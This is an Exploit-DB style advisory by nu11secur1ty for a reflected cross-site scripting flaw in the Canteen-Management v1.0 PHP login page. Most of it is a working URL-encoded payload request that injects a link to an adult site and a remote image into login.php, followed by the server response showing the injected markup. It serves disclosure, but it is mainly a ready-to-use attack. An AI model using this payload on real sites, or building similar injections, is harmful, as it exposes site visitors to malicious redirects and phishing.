Share
## https://sploitus.com/exploit?id=EDB-ID:51062
## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor:  Free PHP Projects & Ideas with Source Codes for Students |
mayurik <https://www.mayurik.com/>
## Software:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:
The name of an arbitrarily supplied URL parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can craft a very malicious HTTPS URL redirecting to a very
malicious URL. When the victim clicks into this crafted URL the game will
over for him.

[+]Payload REQUEST:

```HTML
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22
https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",
"Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

[+]Payload RESPONSE:

```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">
           <style>
.footer1 {
  position: fixed;
  bottom: 0;
  width: 100%;
  color: #5c4ac7;
  text-align: center;
}

</style>
   <!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">

    <link rel="icon" type="image/png" sizes="16x16"
href="assets/uploadImage/Logo/favicon.png">





             <style type="text/css">
@media print {
    #printbtn {
        display :  none;
    }
}
</style>
    <title>Youthappam Canteen Management System - by Mayuri K.
Freelancer</title>

  <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
  <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
    <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
/>

    <link href="assets/css/lib/bootstrap/bootstrap.min.css"
rel="stylesheet">

    <link href="assets/css/helper.css" rel="stylesheet">
    <link href="assets/css/style.css" rel="stylesheet">
 <link rel="stylesheet"
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
 <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
    <link href="assets/css/lib/calendar2/pignose.calendar.min.css"
rel="stylesheet">
     <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
     <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
rel="stylesheet">


    <script type="text/javascript" src="
https://www.gstatic.com/charts/loader.js"></script>
    <script type="text/javascript">
      google.charts.load("current", {packages:["corechart"]});
      google.charts.setOnLoadCallback(drawChart);
      function drawChart() {
        var data = google.visualization.arrayToDataTable([
          ['Food', 'Average sale per Day'],
          ['Masala dosa',     11],
          ['Chicken 65 ',      2],
          ['Karapu Boondi',  2],
          ['Bellam Gavvalu', 2],
          ['Gummadikaya Vadiyalu',    7]
        ]);

        var options = {
          title: 'Food Average Sale per Day',
          pieHole: 0.4,
        };

        var chart = new
google.visualization.PieChart(document.getElementById('donutchart'));
        chart.draw(data, options);
      }
    </script>
</head>

<body class="fix-header fix-sidebar">

<div id="page"></div>
<div id="loading"></div>





    <div id="main-wrapper">
        <div class="unix-login">

            <div class="container-fluid" style="background-image:
url('assets/myimages/background.jpg');
 background-color: #ffffff;background-size:cover">
                <div class="row">
                    <div class="col-lg-4 ml-auto">
                        <div class="login-content">
                            <div class="login-form">
                                <center><img
src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
                                <form
action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"
target="_blank" rel="noopener nofollow ugc"> <img src="https:/
raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"
method="post" id="loginForm">
                                    <div class="form-group">

                                        <input type="text" name="username"
id="username" class="form-control" placeholder="Username" required="">

                                    </div>
                                    <div class="form-group">

                                        <input type="password"
id="password" name="password" class="form-control" placeholder="Password"
required="">
                                    </div>


                                    <button type="submit" name="login"
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>

                                <!-- <div class="forgot-phone text-right
f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->

<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development
Requirement&body = I saw your projects. I want to develop a project"
class="text-right f-w-600"> Click here to contact me</a>
</div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>




    <script src="./assets/js/lib/jquery/jquery.min.js"></script>

    <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
    <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>

    <script src="./assets/js/jquery.slimscroll.js"></script>

    <script src="./assets/js/sidebarmenu.js"></script>

    <script
src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

    <script src="./assets/js/custom.min.js"></script>
    <script>

function onReady(callback) {
    var intervalID = window.setInterval(checkReady, 1000);
    function checkReady() {
        if (document.getElementsByTagName('body')[0] !== undefined) {
            window.clearInterval(intervalID);
            callback.call(this);
        }
    }
}

function show(id, value) {
    document.getElementById(id).style.display = value ? 'block' : 'none';
}

onReady(function () {
    show('page', true);
    show('loading', false);
});
    </script>
</body>

</html>
```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management
)

## Proof and Exploit:
[href](https://streamable.com/emg0zo)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>